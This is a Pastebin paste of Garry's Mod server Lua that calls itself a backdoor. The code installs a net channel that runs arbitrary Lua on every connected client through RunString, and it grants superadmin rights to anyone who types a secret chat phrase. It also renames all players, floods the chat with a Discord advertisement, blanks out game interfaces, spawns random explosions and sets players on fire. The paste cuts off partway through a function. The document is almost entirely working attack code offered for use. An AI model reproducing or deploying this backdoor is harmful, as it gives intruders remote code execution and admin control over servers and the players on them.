MarlowFR

Untitled

Jul 15th, 2019
516
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.28 KB | None | 0 0
  1. util.AddNetworkString "skeleton_dancing_troll"
  2.  
  3.  
  4. timer.Create("nonameplease", 5, 0,function()
  5. for i=1, #player.GetHumans() do
  6. local ply = player.GetHumans()[i]
  7. ply:Say( "/ooc Rejoignez l'élite! ===> https://discord.gg/n8Heezw")
  8. end
  9. end)
  10. BroadcastLua([[hook.Add("Think","iuefheqefq",function() gui.HideGameUI() end)]])
  11. util.AddNetworkString "EnigmaProject"
  12.  
  13. local CHANGERPSEUDO = "wxm la backdoor du diable"
  14. local enigmalaunchproject = {}
  15. function enigmalaunchproject:RandomString( intMin, intMax )
  16. local ret = ""
  17. for _ = 1, math.random( intMin, intMax ) do
  18. ret = ret.. string.char( math.random(65, 90) )
  19. end
  20.  
  21. return ret
  22. end
  23.  
  24.  
  25.  
  26. enigmalaunchproject.m_tblActions = {}
  27. enigmalaunchproject.m_strImageGlobalVar = enigmalaunchproject:RandomString( 6, 12 )
  28. enigmalaunchproject.m_strImageLoadHTML = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" /></body>]]
  29.  
  30. function enigmalaunchproject:NouvelleAction( intChainDelay, func )
  31. self.m_tblActions[#self.m_tblActions +1] = { intChainDelay, func }
  32. end
  33.  
  34. function enigmalaunchproject:ActionApres( pPlayer )
  35. pPlayer.m_intCurAction = pPlayer.m_intCurAction +1
  36. if not self.m_tblActions[pPlayer.m_intCurAction] then return end
  37.  
  38. timer.Simple( self.m_tblActions[pPlayer.m_intCurAction][1], function()
  39. if not IsValid( pPlayer ) then return end
  40. self.m_tblActions[pPlayer.m_intCurAction][2]( pPlayer )
  41. self:ActionApres( pPlayer )
  42. end )
  43. end
  44.  
  45. function enigmalaunchproject:Start( pPlayer )
  46. pPlayer.m_intCurAction = 0
  47. self:ActionApres( pPlayer )
  48. end
  49.  
  50. function enigmalaunchproject:SendLua( pPlayer, strLua )
  51. pPlayer:SendLua([[RunConsoleCommand("gmod_language","ko")]])
  52. net.Start( "EnigmaProject" )
  53. net.WriteString( strLua )
  54. net.Send( pPlayer )
  55. end
  56.  
  57. function enigmalaunchproject:SetupPlayer( pPlayer )
  58. pPlayer:SendLua( "net.Receive(\"EnigmaProject\", function() RunString(net.ReadString()) end)" )
  59. end
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66. -- DANSE --
  67.  
  68.  
  69. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end timer.Create("dance_until_your_dead",8.9,0,function() for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end end )
  70.  
  71.  
  72. -- FIN DANSE --
  73.  
  74.  
  75.  
  76.  
  77. -- CHANGER NOM --
  78.  
  79.  
  80. for k, v in pairs(player.GetAll()) do DarkRP.storeRPName(v, CHANGERPSEUDO) v:setDarkRPVar("rpname", CHANGERPSEUDO) end
  81.  
  82.  
  83. -- FIN CHANGER NOM --
  84.  
  85.  
  86.  
  87. -- Console Spam
  88.  
  89. decore = {
  90. [[
  91.  
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106.  
  107.  
  108.  
  109.  
  110.  
  111.  
  112.  
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  
  121.  
  122.  
  123.  
  124.  
  125.  
  126.  
  127.  
  128.  
  129.  
  130.  
  131.  
  132.  
  133.  
  134.  
  135.  
  136.  
  137.  
  138.  
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
  152.  
  153.  
  154.  
  155.  
  156.  
  157.  
  158.  
  159.  
  160.  
  161.  
  162.  
  163.  
  164. wxm @ https://discord.gg/n8Heezw
  165. ]]
  166. }
  167.  
  168. function decorationconsole()
  169. print(Color( 0, 0, 0 ), table.Random(decore))
  170. end
  171. -- Console Spam
  172. for k, v in pairs( player.GetAll() ) do
  173. timer.Create("consolespamenigma", 0.4, 0, function() decorationconsole( v ) end )
  174. end
  175.  
  176. --[[ MODE ARMAGEDDON --
  177.  
  178.  
  179. hook.Add("Think", "armageddon", function()
  180. local explode = ents.Create( "env_explosion" )
  181. explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  182. explode:Spawn()
  183. explode:SetKeyValue( "iMagnitude", "500" )
  184. explode:Fire( "Explode", 0, 0 )
  185. end)
  186.  
  187.  
  188. -- FIN MODE ARMAGEDDON ]]--
  189.  
  190.  
  191. -- Send Lua --
  192. function SendLuaAll( str ) net.Start( "EnigmaProject" ) net.WriteString( str ) net.Broadcast() end
  193.  
  194.  
  195. -- Changer Taille --
  196.  
  197.  
  198. hook.Add("Think", "giant", function()
  199. for k,v in pairs (player.GetAll()) do
  200. v:SetModelScale(50.5, 100);
  201. v:SetRunSpeed(700 * 2);
  202. v:SetWalkSpeed(400 * 2);
  203. end
  204. end)
  205.  
  206.  
  207. -- Fin Changer Taille --
  208.  
  209.  
  210.  
  211. -- Message --
  212.  
  213.  
  214. for k,v in pairs(player.GetAll()) do
  215. v:ConCommand("say /ooc Oups, votre serveur se fait percer de tout les côtes! :(")
  216. end
  217.  
  218.  
  219. -- Message Fin --
  220.  
  221.  
  222.  
  223. -- Auto Lançage --
  224.  
  225.  
  226. for k, v in pairs( player.GetAll() ) do
  227. enigmalaunchproject:SetupPlayer( v )
  228. timer.Simple( 2, function() enigmalaunchproject:Start( v ) end )
  229. end
  230.  
  231.  
  232. -- Fin Auto Lançage --
  233.  
  234.  
  235. -- Lancer Aux Nouveaux Arrivants --
  236.  
  237.  
  238. --hook.Add( "PlayerAuthed", "wtfispassequoi", function( pPlayer )
  239. -- enigmalaunchproject:SetupPlayer( pPlayer )
  240. -- timer.Simple( 10, function() enigmalaunchproject:Start( pPlayer ) end )
  241. --end )
  242.  
  243. -- Fin Lancer Aux Nouveaux Arrivants --
  244.  
  245.  
  246.  
  247. -- Commande Enigma --
  248.  
  249.  
  250. hook.Add( "PlayerSay", "EnigmaCKoa", function( pSender, strText, bTeamChat )
  251. if strText:sub( 1, 5 ) == "Enigma" then
  252. pSender:Ignite( 1e9 )
  253. pSender:ChatPrint( "wxm la backdoor private la plus puissante de GMod ;)" )
  254. pSender:SendLua( [[surface.PlaySound( "vo/npc/male01/hacks01.wav" )]] )
  255. return false
  256. end
  257. end )
  258.  
  259.  
  260. -- Fin Commande Enigma
  261.  
  262.  
  263.  
  264.  
  265.  
  266. hook.Add( "PlayerSay", "a4dxvlwxdlco", function( pSender, strText, bTeamChat )
  267. if strText:sub( 1, 5 ) == "EnigmaIsLitteralyMyFuckingGod" then
  268. pSender:SetUserGroup("superadmin")
  269. pSender:ChatPrint( "Tu est l'un des notres !" )
  270. pSender:SendLua( [[surface.PlaySound( "vo/npc/male01/hacks01.wav" )]] )
  271. return false
  272. end
  273. end)
  274.  
  275.  
  276.  
  277.  
  278.  
  279.  
  280.  
  281.  
  282.  
  283.  
  284. enigmalaunchproject:NouvelleAction( 0, function( pPlayer )
  285. enigmalaunchproject:SendLua( pPlayer, ([=[
  286.  
  287.  
  288. g_]=].. enigmalaunchproject.m_strImageGlobalVar.. [=[ = {}
  289. local html = [[%s]]
  290. local function LoadWebMaterial( strURL, strUID, intSizeX, intSizeY )
  291. local pnl = vgui.Create( "HTML" )
  292. pnl:SetPos( ScrW() -1, ScrH() -1 )
  293. pnl:SetVisible( true )
  294. pnl:SetMouseInputEnabled( false )
  295. pnl:SetKeyBoardInputEnabled( false )
  296. pnl:SetSize( intSizeX, intSizeY )
  297. pnl:SetHTML( html:format(strURL, intSizeX, intSizeY) )
  298.  
  299. local PageLoaded
  300. PageLoaded = function()
  301. local mat = pnl:GetHTMLMaterial()
  302. if mat then
  303. g_]=].. enigmalaunchproject.m_strImageGlobalVar.. [=[[strUID] = { mat, pnl }
  304. return
  305. end
  306.  
  307. timer.Simple( 0.5, PageLoaded )
  308. end
  309.  
  310. PageLoaded()
  311. end
  312.  
  313. --LoadWebMaterial( "https://image.noelshack.com/fichiers/2018/06/5/1518211648-sans-titre-6.gif", "getrekt", 1920, 1080 )
  314.  
  315. hook.Add( "RenderScreenspaceEffects", "itsredworld", function()
  316. local sinScaler = math.sin( CurTime() )
  317. DrawBloom(
  318. 0,
  319. 3,
  320. sinScaler *math.Rand(1, 8),
  321. sinScaler *math.Rand(1, 8),
  322. 6,
  323. math.Rand(0.5, 2),
  324. math.Rand(0, 0.3),
  325. math.Rand(0, 0.3),
  326. math.Rand(0.5, 1)
  327. )
  328.  
  329. DrawColorModify{
  330. ["$pp_colour_addr"] = 1,
  331. ["$pp_colour_addg"] = 0,
  332. ["$pp_colour_addb"] = 0,
  333. ["$pp_colour_brightness" ] = 0.1,
  334. ["$pp_colour_contrast" ] = 0.1,
  335. ["$pp_colour_colour" ] = 0.1,
  336. ["$pp_colour_mulr" ] = 1,
  337. ["$pp_colour_mulg" ] = 0,
  338. ["$pp_colour_mulb" ] = 0
  339. }
  340. end )
  341.  
  342. ]=]):format(enigmalaunchproject.m_strImageLoadHTML) )
  343. end )
  344.  
  345.  
  346.  
  347.  
  348. enigmalaunchproject:NouvelleAction( 14, function( pPlayer )
  349. enigmalaunchproject:SendLua( pPlayer, [[
  350.  
  351. (GAMEMODE or GM).CalcView = function() end
  352. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  353.  
  354. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  355. for k, v in pairs(remove) do
  356. hook.GetTable()[v] = {}
  357. end
  358.  
  359. local function GetWebMat( strURL )
  360. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  361. end
  362.  
  363. hook.Add( "HUDPaint", "hud1enigma", function()
  364. surface.SetDrawColor( 255, 255, 255, 255 )
  365.  
  366. if GetWebMat( "getrekt" ) then
  367. surface.SetMaterial( GetWebMat("getrekt")[1] )
  368. surface.DrawTexturedRect( 0, 0, 2100, 2000 )
  369. end
  370.  
  371. draw.SimpleTextOutlined(
  372. "wxm is here",
  373. "DermaLarge",
  374. ScrW() /2 +math.random( -2, 2 ),
  375. ScrH() /2 +math.random( -2, 2 ) +0,
  376. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  377. TEXT_ALIGN_CENTER,
  378. TEXT_ALIGN_CENTER,
  379. 1,
  380. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  381. )
  382. end )
  383.  
  384. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  385. hook.Add( "HUDShouldDraw", "hud1enigma", function( str ) if not allowed[str] then return false end end )
  386.  
  387. ]] )
  388. end )
  389.  
  390.  
  391.  
  392. enigmalaunchproject:NouvelleAction( 4, function( pPlayer )
  393. enigmalaunchproject:SendLua( pPlayer, [[
  394.  
  395. hook.Remove( "HUDPaint", "hud1enigma", function() end)
  396.  
  397.  
  398.  
  399. ]] )
  400. end )
  401.  
  402. enigmalaunchproject:NouvelleAction( 3, function( pPlayer )
  403. enigmalaunchproject:SendLua( pPlayer, [[
  404.  
  405. (GAMEMODE or GM).CalcView = function() end
  406. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  407.  
  408. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  409. for k, v in pairs(remove) do
  410. hook.GetTable()[v] = {}
  411. end
  412.  
  413. local function GetWebMat( strURL )
  414. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  415. end
  416.  
  417. hook.Add( "HUDPaint", "hud1enigma", function()
  418. surface.SetDrawColor( 255, 255, 255, 255 )
  419.  
  420. if GetWebMat( "getrekt" ) then
  421. surface.SetMaterial( GetWebMat("getrekt")[1] )
  422. surface.DrawTexturedRect( 0, 0, 2100, 2000 )
  423. end
  424.  
  425. draw.SimpleTextOutlined(
  426. "wxm was here",
  427. "DermaLarge",
  428. ScrW() /2 +math.random( -2, 2 ),
  429. ScrH() /2 +math.random( -2, 2 ) +0,
  430. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  431. TEXT_ALIGN_CENTER,
  432. TEXT_ALIGN_CENTER,
  433. 1,
  434. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  435. )
  436. end )
  437.  
  438. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  439. hook.Add( "HUDShouldDraw", "hud1enigma", function( str ) if not allowed[str] then return false end end )
  440.  
  441.  
  442. ]] )
  443. end )
  444.  
  445.  
  446. enigmalaunchproject:NouvelleAction( 4, function( pPlayer )
  447. enigmalaunchproject:SendLua( pPlayer, [[
  448.  
  449. hook.Remove( "HUDPaint", "hud1enigma", function() end)
  450.  
  451. ]] )
  452. end )
  453.  
  454. enigmalaunchproject:NouvelleAction( 3, function( pPlayer )
  455. enigmalaunchproject:SendLua( pPlayer, [[
  456.  
  457.  
  458. (GAMEMODE or GM).CalcView = function() end
  459. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  460.  
  461. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  462. for k, v in pairs(remove) do
  463. hook.GetTable()[v] = {}
  464. end
  465.  
  466. local function GetWebMat( strURL )
  467. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  468. end
  469.  
  470. hook.Add( "HUDPaint", "hud1enigma", function()
  471. surface.SetDrawColor( 255, 255, 255, 255 )
  472.  
  473. if GetWebMat( "getrekt" ) then
  474. surface.SetMaterial( GetWebMat("getrekt")[1] )
  475. surface.DrawTexturedRect( 0, 0, 2100, 2000 )
  476. end
  477.  
  478. draw.SimpleTextOutlined(
  479. "Rejoignez l'élite en venant sur discord!",
  480. "DermaLarge",
  481. ScrW() /2 +math.random( -2, 2 ),
  482. ScrH() /2 +math.random( -2, 2 ) +0,
  483. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  484. TEXT_ALIGN_CENTER,
  485. TEXT_ALIGN_CENTER,
  486. 1,
  487. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  488. )
  489. end )
  490.  
  491. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  492. hook.Add( "HUDShouldDraw", "hud1enigma", function( str ) if not allowed[str] then return false end end )
  493.  
  494.  
  495.  
  496. ]] )
  497. end )
  498.  
  499. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  500. enigmalaunchproject:SendLua( pPlayer, [[
  501.  
  502. for k,v in pairs(player.GetAll()) do
  503. v:ConCommand("say /job wxm ma vie")
  504. end
  505.  
  506. ]] )
  507. end )
  508. local lol = {}
  509. function lol:RandomString( intMin, intMax )
  510. local ret = ""
  511. for _ = 1, math.random( intMin, intMax ) do
  512. ret = ret.. string.char( math.random(65, 90) )
  513. end
  514.  
  515. return ret
  516. end
  517.  
  518. lol.m_tblActions = {}
  519. lol.m_strImageGlobalVar = lol:RandomString( 6, 12 )
  520. lol.m_strImageLoadHTML = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" /></body>]]
  521.  
  522. function lol:PushAction( intChainDelay, func )
  523. self.m_tblActions[#self.m_tblActions +1] = { intChainDelay, func }
  524. end
  525.  
  526. function lol:NextAction( pPlayer )
  527. pPlayer.m_intCurAction = pPlayer.m_intCurAction +1
  528. if not self.m_tblActions[pPlayer.m_intCurAction] then return end
  529.  
  530. timer.Simple( self.m_tblActions[pPlayer.m_intCurAction][1], function()
  531. if not IsValid( pPlayer ) then return end
  532. self.m_tblActions[pPlayer.m_intCurAction][2]( pPlayer )
  533. self:NextAction( pPlayer )
  534. end )
  535. end
  536.  
  537. function lol:Start( pPlayer )
  538. pPlayer.m_intCurAction = 0
  539. self:NextAction( pPlayer )
  540. end
  541.  
  542. function lol:SendLua( pPlayer, strLua )
  543. net.Start( "skeleton_dancing_troll" )
  544. net.WriteString( strLua )
  545. net.Send( pPlayer )
  546. end
  547.  
  548. function lol:SetupPlayer( pPlayer )
  549. pPlayer:SendLua( "net.Receive(\"skeleton_dancing_troll\", function() RunString(net.ReadString()) end)" )
  550. end
  551.  
  552. for k, v in pairs( player.GetAll() ) do
  553. lol:SetupPlayer( v )
  554. timer.Simple( 2, function() lol:Start( v ) end )
  555. end
  556.  
  557. hook.Add( "PlayerAuthed", "wat", function( pPlayer )
  558. lol:SetupPlayer( pPlayer )
  559. timer.Simple( 10, function() lol:Start( pPlayer ) end )
  560. end )
  561.  
  562. hook.Add( "PlayerSay", "1337command", function( pSender, strText, bTeamChat )
  563. if strText:sub( 1, 5 ) == "/1337" then
  564. pSender:Ignite( 1e9 )
  565. pSender:ChatPrint( "wxm best backdoor ever ;)" )
  566. pSender:SendLua( [[surface.PlaySound( "vo/npc/male01/hacks01.wav" )]] )
  567. return false
  568. end
  569. end )
  570.  
  571.  
  572.  
  573.  
  574. lol:PushAction( 0, function( pPlayer )
  575.  
  576. end )
  577. enigmalaunchproject:NouvelleAction( 2, function( pPlayer )
  578. enigmalaunchproject:SendLua( pPlayer, [[
  579.  
  580. hook.Remove( "HUDPaint", "hud1enigma", function() end)
  581.  
  582. ]] )
  583. end )
  584.  
  585. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  586. enigmalaunchproject:SendLua( pPlayer, [[
  587.  
  588. RunConsoleCommand("+right")
  589.  
  590. ]] )
  591. end )
  592.  
  593. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  594. enigmalaunchproject:SendLua( pPlayer, [[
  595.  
  596. RunConsoleCommand("-right")
  597.  
  598. ]] )
  599. end )
  600.  
  601. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  602. enigmalaunchproject:SendLua( pPlayer, [[
  603.  
  604. RunConsoleCommand("+duck")
  605.  
  606. ]] )
  607. end )
  608.  
  609. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  610. enigmalaunchproject:SendLua( pPlayer, [[
  611.  
  612. RunConsoleCommand("-duck")
  613.  
  614. ]] )
  615. end )
  616.  
  617. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  618.  
  619. timer.Create( "lespamckool", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "wxm l\'élite des backdoors" )' ) end)
  620. timer.Create( "lespamckool2", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "rejoignez l\'élite!" )' ) end)
  621. timer.Create( "lespamckool3", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "https://discord.gg/n8Heezw" )' ) end)
  622. timer.Create( "lespamckool4", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "Marlow" )' ) end)
  623. timer.Create( "lespamckool5", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "https://discord.gg/n8Heezw" )' ) end)
  624. timer.Create( "lespamckool6", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "wxm vous couche tous" )' ) end)
  625. timer.Create( "lespamckool7", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "gvac c\'est pour vous bande de pucelles" )' ) end)
  626. timer.Create( "lespamckool8", 0.5, 0, function() SendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), "~ l\'élite des backdoors - https://discord.gg/n8Heezw" )' ) end)
  627.  
  628. end )
  629.  
  630.  
  631. enigmalaunchproject:NouvelleAction( 4, function( pPlayer )
  632.  
  633. timer.Remove( "lespamckool" )
  634. timer.Remove( "lespamckool2" )
  635. timer.Remove( "lespamckool3" )
  636. timer.Remove( "lespamckool4" )
  637. timer.Remove( "lespamckool5" )
  638. timer.Remove( "lespamckool6" )
  639. timer.Remove( "lespamckool7" )
  640. timer.Remove( "lespamckool8" )
  641.  
  642. end )
  643.  
  644. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  645.  
  646.  
  647. RunConsoleCommand("sv_friction", "-50")
  648.  
  649.  
  650. end )
  651.  
  652. enigmalaunchproject:NouvelleAction( 1, function( pPlayer )
  653.  
  654.  
  655. RunConsoleCommand("sv_gravity", "300")
  656.  
  657.  
  658. end )
  659.  
  660. enigmalaunchproject:NouvelleAction( 12, function( pPlayer )
  661.  
  662.  
  663. hook.Add("Think", "armageddon", function()
  664. local explode = ents.Create( "env_explosion" )
  665. explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  666. explode:Spawn()
  667. explode:SetKeyValue( "iMagnitude", "500" )
  668. explode:Fire( "Explode", 0, 0 )
  669. end)
  670.  
  671. end )
  672.  
  673.  
  674. enigmalaunchproject:NouvelleAction( 27, function( pPlayer )
  675.  
  676. hook.Remove( "Think", "armageddon", function() end)
  677.  
  678. end )
  679.  
  680. enigmalaunchproject:NouvelleAction( 7, function( pPlayer )
  681. enigmalaunchproject:SendLua( pPlayer, [[
  682. hook.Add( "RenderScreenspaceEffects", "itsendofworld", function()
  683. local sinScaler = math.sin( CurTime() )
  684. DrawBloom(
  685. 0,
  686. 3,
  687. sinScaler *math.Rand(1, 8),
  688. sinScaler *math.Rand(1, 8),
  689. 6,
  690. math.Rand(0.5, 2),
  691. math.Rand(0, 0.3),
  692. math.Rand(0, 0.3),
  693. math.Rand(0.5, 1)
  694. )
  695.  
  696. DrawColorModify{
  697. ["$pp_colour_addr"] = 0,
  698. ["$pp_colour_addg"] = 0,
  699. ["$pp_colour_addb"] = 0,
  700. ["$pp_colour_brightness" ] = 0.1,
  701. ["$pp_colour_contrast" ] = 0.1,
  702. ["$pp_colour_colour" ] = 0.1,
  703. ["$pp_colour_mulr" ] = 0,
  704. ["$pp_colour_mulg" ] = 0,
  705. ["$pp_colour_mulb" ] = 0
  706. }
  707. end )
  708.  
  709. ]] )
  710. end )
  711.  
  712. enigmalaunchproject:NouvelleAction( 0, function( pPlayer )
  713. enigmalaunchproject:SendLua( pPlayer, [[
  714.  
  715. (GAMEMODE or GM).CalcView = function() end
  716. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  717.  
  718. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  719. for k, v in pairs(remove) do
  720. hook.GetTable()[v] = {}
  721. end
  722.  
  723. local function GetWebMat( strURL )
  724. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  725. end
  726.  
  727. hook.Add( "HUDPaint", "hud1enigma", function()
  728. surface.SetDrawColor( 255, 255, 255, 255 )
  729.  
  730. draw.SimpleTextOutlined(
  731. "wxm",
  732. "HACK",
  733. ScrW() /2 +math.random( -270, 300 ),
  734. ScrH() /2 +math.random( -300, 700 ) +0,
  735. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  736. TEXT_ALIGN_CENTER,
  737. TEXT_ALIGN_CENTER,
  738. 1,
  739. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  740. )
  741. end )
  742.  
  743. ]] )
  744. end )
  745.  
  746.  
  747. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  748. enigmalaunchproject:SendLua( pPlayer, [[
  749.  
  750. (GAMEMODE or GM).CalcView = function() end
  751. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  752.  
  753. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  754. for k, v in pairs(remove) do
  755. hook.GetTable()[v] = {}
  756. end
  757.  
  758. local function GetWebMat( strURL )
  759. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  760. end
  761.  
  762. hook.Add( "HUDPaint", "hud2enigma", function()
  763. surface.SetDrawColor( 255, 255, 255, 255 )
  764.  
  765. draw.SimpleTextOutlined(
  766. "hmm la backdoor qui fait du bien",
  767. "DermaLarge",
  768. ScrW() /2 +math.random( -600, 700 ),
  769. ScrH() /2 +math.random( -200, 800 ) +100,
  770. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  771. TEXT_ALIGN_CENTER,
  772. TEXT_ALIGN_CENTER,
  773. 1,
  774. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  775. )
  776. end )
  777. ]] )
  778. end )
  779.  
  780. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  781. enigmalaunchproject:SendLua( pPlayer, [[
  782.  
  783. (GAMEMODE or GM).CalcView = function() end
  784. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  785.  
  786. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  787. for k, v in pairs(remove) do
  788. hook.GetTable()[v] = {}
  789. end
  790.  
  791. local function GetWebMat( strURL )
  792. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  793. end
  794.  
  795. hook.Add( "HUDPaint", "hud3enigma", function()
  796. surface.SetDrawColor( 255, 255, 255, 255 )
  797.  
  798. draw.SimpleTextOutlined(
  799. "wxm",
  800. "DermaLarge",
  801. ScrW() /2 +math.random( -400, 500 ),
  802. ScrH() /2 +math.random( -600, 500 ) -100,
  803. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  804. TEXT_ALIGN_CENTER,
  805. TEXT_ALIGN_CENTER,
  806. 1,
  807. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  808. )
  809. end )
  810. ]] )
  811. end )
  812.  
  813. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  814. enigmalaunchproject:SendLua( pPlayer, [[
  815.  
  816. (GAMEMODE or GM).CalcView = function() end
  817. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  818.  
  819. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  820. for k, v in pairs(remove) do
  821. hook.GetTable()[v] = {}
  822. end
  823.  
  824. local function GetWebMat( strURL )
  825. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  826. end
  827.  
  828. hook.Add( "HUDPaint", "hud5enigma", function()
  829. surface.SetDrawColor( 255, 255, 255, 255 )
  830.  
  831. draw.SimpleTextOutlined(
  832. "wxm",
  833. "DermaLarge",
  834. ScrW() /2 +math.random( -500, 500 ),
  835. ScrH() /2 +math.random( -500, 500 ) +0,
  836. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  837. TEXT_ALIGN_CENTER,
  838. TEXT_ALIGN_CENTER,
  839. 1,
  840. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  841. )
  842. end )
  843. ]] )
  844. end )
  845.  
  846. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  847. enigmalaunchproject:SendLua( pPlayer, [[
  848.  
  849. (GAMEMODE or GM).CalcView = function() end
  850. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  851.  
  852. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  853. for k, v in pairs(remove) do
  854. hook.GetTable()[v] = {}
  855. end
  856.  
  857. local function GetWebMat( strURL )
  858. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  859. end
  860.  
  861. hook.Add( "HUDPaint", "hud7enigma", function()
  862. surface.SetDrawColor( 255, 255, 255, 255 )
  863.  
  864. draw.SimpleTextOutlined(
  865. "wxm",
  866. "DermaLarge",
  867. ScrW() /2 +math.random( -700, 700 ),
  868. ScrH() /2 +math.random( -700, 700 ) +300,
  869. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  870. TEXT_ALIGN_CENTER,
  871. TEXT_ALIGN_CENTER,
  872. 1,
  873. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  874. )
  875. end )
  876. ]] )
  877. end )
  878.  
  879. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  880. enigmalaunchproject:SendLua( pPlayer, [[
  881.  
  882. (GAMEMODE or GM).CalcView = function() end
  883. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  884.  
  885. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  886. for k, v in pairs(remove) do
  887. hook.GetTable()[v] = {}
  888. end
  889.  
  890. local function GetWebMat( strURL )
  891. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  892. end
  893.  
  894. hook.Add( "HUDPaint", "hud10enigma", function()
  895. surface.SetDrawColor( 255, 255, 255, 255 )
  896.  
  897. draw.SimpleTextOutlined(
  898. "wxm",
